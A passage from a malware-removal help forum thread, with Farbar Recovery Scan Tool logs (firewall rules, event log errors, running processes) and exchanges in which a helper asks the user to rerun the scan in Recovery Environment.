FirewallRules: [{4819C0F7-D28C-465D-9F1B-E02D925E86AE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
FirewallRules: [{FC9BC8BE-3785-41F0-9673-77798F53F411}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{97D423F4-0FDF-4C9C-9062-3118615A659E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{F3617F33-975E-49A1-82F7-525FC3550128}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{A279D673-8345-423B-A713-D33AE6388178}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{2AC43D62-7AC9-47C0-9BAF-E92B1B7BBA30}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{C12F076D-5E2B-450E-91A2-3D08D18E1937}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{3D3CF842-8298-442A-B9C9-A5399B012E71}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{C31226E6-F861-4DEA-B2FD-2634BE6F0129}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{D12533D4-1609-4FAF-85BD-3A23601A19D7}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C02EE326-2CB8-4B8B-85EE-B9EF5101D2FC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{E6F43DE1-5773-4F5C-997C-8F9A152B8CC6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{4A1A6E79-2801-44AC-93C6-A5698676BF58}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{447CC466-EC34-4DCC-9474-38A417083D49}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{B6E8D305-52B5-45E2-8C5A-2EE37A8ADB44}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{0649CB28-67B5-48B4-B97E-CDA231670A45}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{5BAD7087-DE25-4030-A16A-578CD107BD81}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{BF1E40F5-A2D7-4946-895B-E0067521547F}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [{17ED7A00-1D80-4074-B1AB-25880A7BB6B6}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [TCP Query User{396BBCA8-02CB-4338-8B42-915ECADCD922}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{73E87333-E910-4EEC-804C-17612FDD0764}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{9E3E9781-622A-4CDF-A7EF-F851961BEA19}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{7C52A72D-17FC-484E-A819-81F527082F0F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\Resolve.exe
FirewallRules: [{5B94E67F-A6E7-4C37-B249-3CED37E49F0D}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\bmdpaneld.exe
FirewallRules: [{BA3F2295-A446-4372-A933-C67E6917CAA9}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\JLCooperPanelDaemon.exe
FirewallRules: [{AF2811BE-4318-4F7F-8F60-8E10AD92B8F2}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\EuphonixPanelDaemon.exe
FirewallRules: [{9D04EBDE-0FDE-4918-94E4-D40C3C002C6F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\TangentPanelDaemon.exe
FirewallRules: [{BDA720FB-BED0-4342-84C3-1AF5017ECCAA}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\ElementsPanelDaemon.exe
FirewallRules: [{56DE631C-A030-4DF6-B707-2D24656517FF}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\DPDecoder.exe
FirewallRules: [{B0D56FFA-C1C5-488E-B442-2038AC05A5A6}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe
FirewallRules: [TCP Query User{80D1B33D-1849-4BEE-B7BB-78C9D2D3F544}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [UDP Query User{B40DADB6-9E25-4951-B741-8458BE0396EE}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [{9B19D861-CA78-446B-AD40-2E9AA11FDFB5}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{9A1FF358-15BA-4495-8972-7D4A585582FE}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{DFD16930-C6D4-42A7-8594-A07EAE59D209}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{96FED481-82D0-450B-85C3-36735EB1549F}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{17F50D30-FD50-46D0-BEE3-81847CF40C64}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶睜湩晤湩層楷摮楦摮攮數
FirewallRules: [{96606CA1-E101-4434-AE0C-6C99B774D1CA}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶睜湩晤湩層楷摮楦摮⹟硥e
FirewallRules: [{D61EF620-8F0B-40A6-9BB7-E836DA310B7C}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{91606396-6288-43E6-AE6F-EEB421C75181}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{807550B5-7265-4327-9B16-266D34A7742C}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{EE7BB404-A2CF-4E23-A355-EA7C2D953145}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{7C716CAC-0CA5-496D-B6B1-DBB04F82E573}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{047E31DF-A255-4F4C-9FE9-45DD54A3AB3B}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{B06B32BA-F38C-4C17-B422-99E7605B0063}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{E511541B-CD44-4376-A542-B6A6578FA8EE}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{068BAA54-B58F-43B6-8ADB-31E4DEE03ACC}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{B44756B4-DFCA-4CC9-953C-CCE8AE6CC11A}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{3C331E6B-E428-4D0C-BEA4-0FA06032B9D0}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{D450C4CE-50CA-4D6B-A47C-AF19379507B1}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{640DFB21-833E-420D-B80D-AC0DD899B614}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{6CAA584E-EA21-4F97-9554-1E5312569977}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{099E93F9-CFBA-4E6D-A852-0EFDF6E69C77}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{10B74A86-9FC5-4D84-955B-4B2C2FAADC83}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{65FA2FF6-971C-44E8-8D5E-C565539E0181}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{88078A39-6DBF-4310-9720-BC7A9811094B}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{5D12474E-76BE-4D8A-8BD7-4CECA0F32CFB}] => (Allow) C:\Users\Dan\AppData\Local\Kometa\Application\kometa.exe
FirewallRules: [{814CAEF2-ADD6-4507-BAE2-55F6820A7994}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬攮數
FirewallRules: [{0E3753F1-E381-437A-BC70-0B47ECA113FA}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬⹟硥e
FirewallRules: [{8269955E-0B8F-464C-B326-2023E770CABC}] => (Allow) C:\Program Files (x86)\Henwood\fontenot.exe
FirewallRules: [{3606180A-FA39-4B14-88F6-E879C8BB4B0B}] => (Allow) C:\Program Files (x86)\Police\fontenot.exe
FirewallRules: [{99FAD6CC-61D4-4806-B204-7F3641DDD7F3}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [{6CCE0F5A-ED5B-48E9-898C-B3168715BED1}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [TCP Query User{9536F0CC-5E66-46E8-805B-67D9697C530F}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{C5258519-221C-4A37-A687-51526258F672}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{5507329C-601E-4572-9AD8-6C16774E1ADC}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{187A8271-92D7-449D-8643-56ECD2671F9C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C260D9CD-8DD2-4B5A-8BDE-C4CFD01C9F25}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{DB1E8DAE-0016-43D8-BB69-DC8005FC9089}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{EA5A15E3-2AE2-47A4-AB76-6A52AAB47F97}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{31F2912A-119F-44BD-A9EB-53A4D506D23B}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Faulty Device Manager Devices =============
 
Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (06/12/2018 08:17:40 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 8b8
 
Start Time: 01d402ab38069555
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: 2b4c483d-6e9f-11e8-835c-10c37bbb446b
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (06/11/2018 09:42:03 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 7c4
 
Start Time: 01d401edd725fe22
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: ca66cabd-6de1-11e8-835b-10c37bbb446b
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (06/11/2018 08:58:06 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 894
 
Start Time: 01d401e7b235f644
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: a65dd9f3-6ddb-11e8-8359-10c37bbb446b
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (06/11/2018 08:45:56 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:45:56Z. Error Code: 0x80070020.
 
Error: (06/11/2018 08:45:44 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Windows Search Service failed to process the list of included and excluded locations with the error <20, 0x80070020, "">.
 
Error: (06/11/2018 08:45:26 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:45:26Z. Error Code: 0x80070020.
 
Error: (06/11/2018 08:44:56 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:44:56Z. Error Code: 0x80070020.
 
Error: (06/11/2018 08:44:26 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:44:25Z. Error Code: 0x80070020.
 
 
System errors:
=============
Error: (06/12/2018 08:41:07 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The GamesAppIntegrationService service failed to start due to the following error: 
%%2 = The system cannot find the file specified.
 
Error: (06/12/2018 08:37:40 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/12/2018 08:37:40 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/12/2018 08:37:40 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/12/2018 08:37:40 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/12/2018 08:37:40 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/12/2018 08:37:05 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The 6320c4d4d9492959f6f8b43b8fdbf2f5 service failed to start due to the following error: 
%%1053 = The service did not respond to the start or control request in a timely fashion.
 
Error: (06/12/2018 08:37:05 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the 6320c4d4d9492959f6f8b43b8fdbf2f5 service to connect.
 
 
Windows Defender:
===================================
Date: 2015-02-02 09:49:52.792
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {4BF9AF7B-A43D-4E64-B277-DEFB56CDC0E3}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-02 08:06:18.260
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {16FD4F1F-550C-4A26-9400-0412629CFD5A}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 10:17:58.118
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {BADC4EF7-6BAD-444C-AB05-92085B6CF93D}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 08:23:26.263
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {C9B87AF6-96B3-4644-9422-EB0CED28391C}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-01-31 08:30:36.872
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {4D8C80CB-F50C-47EE-94E8-DC02EC0EE056}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 05:57:28.954
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version: 
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.938
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiSpyware
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.938
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.844
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x8024402c
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support. 
 
Date: 2015-01-30 05:22:07.607
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version: 
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
CodeIntegrity:
===================================
 
Date: 2018-06-12 20:36:48.243
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-12 20:16:24.029
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-11 21:40:11.899
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-11 21:18:22.725
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-11 20:52:06.834
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-11 20:17:14.808
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-10 20:22:12.478
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-09 19:37:48.069
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
==================== Memory info =========================== 
 
Processor: Intel® Celeron® CPU N2830 @ 2.16GHz
Percentage of memory in use: 45%
Total physical RAM: 3982.68 MB
Available physical RAM: 2169.89 MB
Total Virtual: 4686.68 MB
Available Virtual: 2949.03 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:444.65 GB) (Free:145.51 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: () (Removable) (Total:7.45 GB) (Free:2.36 GB) FAT32
 
\\?\Volume{3e80ab0f-bf50-4f22-8c02-3c22ee1a6bb4}\ (Recovery) (Fixed) (Total:0.88 GB) (Free:0.59 GB) NTFS
\\?\Volume{436d9e19-7fb5-4350-864c-86573ec335b2}\ () (Fixed) (Total:0 GB) (Free:0 GB) 
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 3F7852A4)
 
Partition: GPT.
 
========================================================
Disk: 1 (Protective MBR) (Size: 7.5 GB) (Disk ID: 00000000)
 
Partition: GPT.
 
==================== End of Addition.txt ============================




#32 RayS

RayS

  • Malware Response Team
  • 2,434 posts
  • OFFLINE
  • Gender:Male
  • Location:USA
  • Local time:11:04 AM

Posted 13 June 2018 - 11:00 PM

Hi Dan,

 

Here is the txt fix and addition logs of doing that command prompt again.

I'm also going to do what you said in the last reply and will be back with the txt logs tomorrow.

Yes, please run the scan as instructed in Post #28.

 

Until we get a scan in Recovery Environment, all the logs are useless.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06.06.2018 01
Ran by Dan (administrator) on BEATLES (12-06-2018 20:43:02)
Running from D:\
Loaded Profiles: Dan (Available Profiles: Dan)
Platform: Windows 8.1 Connected (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal

Boot Mode must be in Recovery Environment.

 

Thank you,

 

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#33 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  • Gender:Male
  • Location:Bronx New York
  • Local time:12:04 PM

Posted 15 June 2018 - 03:07 PM

Hello Ray,

 

This is Dan.

 

All the past Command Prompts were not done by the method link you sent because it doesn't work for my laptop.

Also I searched all the net and YouTube to find other ways and it still didn't work.

Then I realized when I right-click on my Windows 8, there are menus for Command Prompt & Command Prompt run through Administrator.

All the past command prompts I ran that I sent you were done through this way, Command Prompt.

The only problem is it does it through normal boot mode and not through Recovery Mode, as you have seen in all the logs.

 

If you have a solution to get around this problem, let me know.

 

I do have one way I did find on the net where I can go into Safe Mode by forcing it to boot through the System Configuration utility by hitting Windows+R to bring up the Run box. Type “msconfig” into the box, and then hit Enter.

 

I have not done this yet and will try it tomorrow and we'll see if that will work.

 

Here is the log again from the boot mode scan I did. It may not help, and I also had to copy and paste it into Word because

the computer I'm using during the day can't open Notepad.

I use another computer at night to send you logs from Notepad, but I won't have access to that computer until Sunday, so for now,

I'll be back with results on Monday.

 

My Frst Txt - 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06.06.2018 01

Ran by Dan (administrator) on BEATLES (14-06-2018 21:42:26)

Running from D:\

Loaded Profiles: Dan (Available Profiles: Dan)

Platform: Windows 8.1 Connected (Update) (X64) Language: English (United States)

Internet Explorer Version 11 (Default browser: IE)

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(TOSHIBA CORPORATION) C:\Windows\System32\avmhengsvc.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe

(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe

(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe

(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe

() C:\ProgramData\dahhService\dahhService.exe

() C:\Program Files\Gramblr\gramblr.exe

(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

(www.shadowexplorer.com) C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe

(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe

() C:\Users\Dan\AppData\Local\aucozre\aucozre.exe

() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe

() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe

(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe

(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe

(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe

(Intel Corporation) C:\Windows\System32\igfxtray.exe

(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe

() C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe

(Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe

(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\MaxxAudioControl64.exe

(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe

(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe

